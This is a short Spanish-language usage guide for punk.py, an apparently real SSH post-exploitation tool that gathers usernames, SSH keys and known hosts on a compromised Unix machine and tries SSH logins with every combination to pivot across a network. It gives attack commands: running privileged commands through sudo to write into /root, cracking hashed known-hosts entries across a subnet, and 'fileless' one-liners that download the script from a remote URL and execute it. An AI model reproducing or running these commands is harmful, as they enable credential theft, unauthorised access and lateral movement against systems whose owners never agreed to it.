
herramienta 1337 de post-explotación SSH para Unix
Herramienta 1337 de post-explotación SSH en Unix
punk.py es una herramienta de post-explotación diseñada para ayudar en el pivoteo de redes desde una caja Unix comprometida. Recolecta nombres de usuario, claves SSH y hosts conocidos de un sistema Unix, y luego intenta conectarse vía SSH a todas las combinaciones encontradas. punk.py está escrito para funcionar tanto en los intérpretes estándar de Python 2 como de Python 3.

Ejecución estándar:
~$ ./punk.py
Omitir comprobaciones de passwd y usar una ruta de home personalizada:
~$ ./punk.py --no-passwd --home /home/ldapusers/
Ejecutar comandos con sudo:
~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"
Descifrando hosts conocidos con hash SSH:
~$ ./punk.py --crack 192.168.0.0/24
Línea única sin archivos en Python2 (con el parámetro --no-passwd):
~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd
Línea única sin archivos en Python3:
~$ python3 -c "import requests;exec(requests.get('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').text)"